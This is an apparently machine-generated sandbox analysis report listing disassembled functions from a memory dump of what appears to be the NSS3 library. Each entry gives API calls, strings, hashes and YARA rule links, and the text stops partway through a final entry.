Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: 1e63ec88ea749b94f54665bcd26c2c9124d6190e494dd705cbd91e1c75473b81
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 401134B5A14740EFF7245E65EC81B6BB2E8EF5124AF410538E50E8EA20E233EC15C693

Function 6D5189E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6D5188AE,-00000008), ref: 6D518A04
EnterCriticalSection.KERNEL32(?), ref: 6D518A15
memset.VCRUNTIME140(6D5188AE,00000000,00000132), ref: 6D518A27
PR_Unlock.NSS3(?), ref: 6D518A35
memset.VCRUNTIME140(6D5188AE,00000000,00000132,00000000,-00000008,00000000,?,?,6D5188AE,-00000008), ref: 6D518A45
free.MOZGLUE(6D5188A6,?,6D5188AE,-00000008), ref: 6D518A4E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: b79155ebdab9c457d20a6a4e2262bdeb118a34d7c7f45e6da8beb29f592f9280
Instruction ID: f56bc11e0ac89eb9ea067f33c8dca95e2727db3a3930056a3754e67e3b83e6e9
Opcode Fuzzy Hash: b79155ebdab9c457d20a6a4e2262bdeb118a34d7c7f45e6da8beb29f592f9280
Instruction Fuzzy Hash: 95113BB5D08201ABFB10DF69DC45B2ABB78FF45314F010821E91896501E732E554C7F2

Function 6D55FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D55FE08

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D55FE1D

Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D55FE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D55FE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D55FE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6D55FE6F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 9b68ce85474b961506142c283e0a63f6dd6884754893d14a82b879593b59d2a0
Instruction ID: bea5c8955e56350805bd994474069f9fd3e87702fda24874800d2c2ed812cdbb
Opcode Fuzzy Hash: 9b68ce85474b961506142c283e0a63f6dd6884754893d14a82b879593b59d2a0
Instruction Fuzzy Hash: 931108B6604242ABEB068F59EC40F2B73D8AF58395F158435E91D87A22E731E930C7A1

Function 6D618910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6D61892E

Part of subcall function 6D4F0F00: PR_GetPageSize.NSS3(6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F1B
Part of subcall function 6D4F0F00: PR_NewLogModule.NSS3(clock,6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F25

PR_Lock.NSS3 ref: 6D618950

Part of subcall function 6D5C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D4F1A48), ref: 6D5C9BB3
Part of subcall function 6D5C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D4F1A48), ref: 6D5C9BC8

getprotobynumber.WSOCK32(?), ref: 6D618959
GetLastError.KERNEL32(?), ref: 6D618967
PR_GetCurrentThread.NSS3(?,?), ref: 6D61896F
PR_Unlock.NSS3(?,?), ref: 6D61898A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 1582669f09f14913c913fbdc361896f8fa68516af067156713bed8612a96c0e5
Instruction ID: 3d08b7ca61fc206a79640b3b43c5f7052fa84451fbf8ab1a2b5ec4858bc703fd
Opcode Fuzzy Hash: 1582669f09f14913c913fbdc361896f8fa68516af067156713bed8612a96c0e5
Instruction Fuzzy Hash: 6511A37691C160ABC7105FBD9C4075A3B64AB99368B0646A9DE0997271D7308C00CBD6

Function 6D60FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6D60FD9E

Part of subcall function 6D5C9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6D4F1A48), ref: 6D5C9BB3
Part of subcall function 6D5C9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6D4F1A48), ref: 6D5C9BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6D60FDB9

Part of subcall function 6D4EA900: TlsGetValue.KERNEL32(00000000,?,6D6614E4,?,6D484DD9), ref: 6D4EA90F
Part of subcall function 6D4EA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6D4EA94F

PR_Unlock.NSS3 ref: 6D60FDD4
PR_Lock.NSS3 ref: 6D60FDF2
PR_NotifyAllCondVar.NSS3 ref: 6D60FE0D
PR_Unlock.NSS3 ref: 6D60FE23

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 26ab9d9c84950176472da94a36139017d92d155922399b121a158aede41c63e1
Instruction ID: 9728ee04a46786a3dc06e5b6c3c4f915c549bad1ee1e966f1012e28b4edc791f
Opcode Fuzzy Hash: 26ab9d9c84950176472da94a36139017d92d155922399b121a158aede41c63e1
Instruction Fuzzy Hash: 0601A5B6D08241ABCF099F15FC008257631FB462687164379E925472E5E722DD24C6C3

Function 6D596840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6D59AA9B,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D596846

Part of subcall function 6D4F1770: calloc.MOZGLUE(00000001,0000019C,?,6D4F15C2,?,?,?,?,?,00000001,00000040), ref: 6D4F178D

PR_NewMonitor.NSS3(00000000,?,6D59AA9B,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D596855

Part of subcall function 6D558680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6D5055D0,00000000,00000000), ref: 6D55868B
Part of subcall function 6D558680: PR_NewLock.NSS3(00000000,00000000), ref: 6D5586A0
Part of subcall function 6D558680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6D5586B2
Part of subcall function 6D558680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6D5586C8
Part of subcall function 6D558680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6D5586E2
Part of subcall function 6D558680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6D5586EC
Part of subcall function 6D558680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6D558700

PR_NewMonitor.NSS3(?,6D59AA9B,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D59687D

Part of subcall function 6D4F1770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6D4F18DE
Part of subcall function 6D4F1770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6D4F18F1

PR_NewMonitor.NSS3(?,6D59AA9B,?,?,?,?,?,?,?,00000000,?,6D5980C1), ref: 6D59688C

Part of subcall function 6D4F1770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6D4F18FC
Part of subcall function 6D4F1770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6D4F198A

PR_NewLock.NSS3 ref: 6D5968A5

Part of subcall function 6D5C98D0: calloc.MOZGLUE(00000001,00000084,6D4F0936,00000001,?,6D4F102C), ref: 6D5C98E5

PR_NewLock.NSS3 ref: 6D5968B4

Part of subcall function 6D5C98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6D5C9946
Part of subcall function 6D5C98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D4816B7,00000000), ref: 6D5C994E
Part of subcall function 6D5C98D0: free.MOZGLUE(00000000), ref: 6D5C995E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: 771738ddbfd917962428753937240ef861450a9208a5f190365716486ccec358
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: C20112B1608F4746EB59AF7548207B776D45F51289F01083D85ADCA950EF75E808CBE1

Function 6D4EAE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D4EAFDA

Strings

misuse, xrefs: 6D4EAFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D4EAFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6D4EAF5C
%s at line %d of [%.10s], xrefs: 6D4EAFD3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 1c141d7778c099a73b934afc78d15c8cd8132ba348f336a82f208ca93da50c92
Instruction ID: b7d872473bf63a510cbd602cc02f8a9951c3081f159955d14e21a931bb938972
Opcode Fuzzy Hash: 1c141d7778c099a73b934afc78d15c8cd8132ba348f336a82f208ca93da50c92
Instruction Fuzzy Hash: 1591C075A043569FDB04CF29C851FBAB7F1BF49351F1980A8E865AB391C734AC01CBA0

Function 6D54FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6D54FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6D54FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6D54FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6D54FDDE

Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,6D56085A,00000000,?,6D508369,?), ref: 6D558821
Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,?,6D56085A,00000000,?,6D508369,?), ref: 6D55883D
Part of subcall function 6D558800: EnterCriticalSection.KERNEL32(?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558856
Part of subcall function 6D558800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D558887
Part of subcall function 6D558800: PR_Unlock.NSS3(?,?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558899

Strings

pkcs11:, xrefs: 6D54FC4F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: e26633945d359182746a84a608c2b9c23155f23f3f98623d6ae5acee61259116
Instruction ID: 69610c66bc40241c499f9729dd1b170abbf34be380dea0361f3da65bfe71be30
Opcode Fuzzy Hash: e26633945d359182746a84a608c2b9c23155f23f3f98623d6ae5acee61259116
Instruction Fuzzy Hash: FF51F5B1A181129BEB1A8F6CDD40F7A3775FF85318F058825DE055BA51EB30E910CB93

Function 6D5149C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6D514860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D514894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6D516361,?,?,?), ref: 6D514A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6D516361,?,?,?), ref: 6D514AD0

Strings

acQm, xrefs: 6D514AB4
^jQm, xrefs: 6D5149C5
acQm, xrefs: 6D5149FB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: ^jQm$acQm$acQm
API String ID: 1982233058-988996679
Opcode ID: db323207ece7bd345e8978969701018ea24da94f972902419f83dbb30b3eb907
Instruction ID: fab6d43bdac923e91286949c06564858338e8faceb0e71de9d232a59b0524ac8
Opcode Fuzzy Hash: db323207ece7bd345e8978969701018ea24da94f972902419f83dbb30b3eb907
Instruction Fuzzy Hash: 7531E43090C10787FB18CA48EC90B7E7227EB89318F165E3AD61597BC1C6349C48879A

Function 6D48BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6D48BE02

Part of subcall function 6D5B9C40: memcmp.VCRUNTIME140(?,00000000,6D48C52B), ref: 6D5B9D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D48BE9F

Strings

database corruption, xrefs: 6D48BE93
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D48BE89
%s at line %d of [%.10s], xrefs: 6D48BE98

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 47f23fba71749f6b3e8e9a96cbdb94df737fad140e03edc050b9645d75dcc59c
Instruction ID: 462b4290ac613f8a792458ad7b112657bc72d8fa95933e36cbb1123749d55968
Opcode Fuzzy Hash: 47f23fba71749f6b3e8e9a96cbdb94df737fad140e03edc050b9645d75dcc59c
Instruction Fuzzy Hash: 18312031A487668FC701CF688894E7BBBA2AF46394B198404EA881B243D731EC01C7D2

Function 6D576DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6D576E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D576E57

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6D576E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6D576EAA

Strings

nam, xrefs: 6D576DF9

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nam
API String ID: 3163584228-4006275851
Opcode ID: 9204744929ebd4acaf76cf1bea88ead8cbd95794f91f5e797b22593bdef3617a
Instruction ID: 7aac4361e9a7ac52de603d2d55e963406e38b14115f0412d12475cadba2431fe
Opcode Fuzzy Hash: 9204744929ebd4acaf76cf1bea88ead8cbd95794f91f5e797b22593bdef3617a
Instruction Fuzzy Hash: C331DF31614712EFDBAC5E34CC043A7B7A4AB01316F204A3CDD9996A41EB306854CFE2

Function 6D5DA800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6D4A7915,?,?), ref: 6D5DA86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6D4A7915,?,?), ref: 6D5DA8A6

Strings

database corruption, xrefs: 6D5DA89B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D5DA891
%s at line %d of [%.10s], xrefs: 6D5DA8A0

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 218dc9e01cd908de9601df828395b5905c9bcf40814bb91ab3eadb1c0c07cb09
Instruction ID: 62381e6cb3bb4d3db9c2925d13e5c06fdb0c2213e4f6cb925ab5447ef255655d
Opcode Fuzzy Hash: 218dc9e01cd908de9601df828395b5905c9bcf40814bb91ab3eadb1c0c07cb09
Instruction Fuzzy Hash: 5D110671A04214ABDB08CF25DC51E6BB7A6FF59314F108429FD094B681EB31ED15CBA6

Function 6D4F0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6D4F0BDE), ref: 6D4F0DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6D4F0BDE), ref: 6D4F0DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6D4F0BDE), ref: 6D4F0DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6D4F0BDE), ref: 6D4F0E32

Strings

%s incr => %d (find lib), xrefs: 6D4F0E2D

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 8ac9b149b641ce2819d3ad389107809177eb27d4c7707c5726687125a5fd7a22
Instruction ID: dc287555d6c990c3ed981051d69b7add43f34febd7a509196c5a146164348814
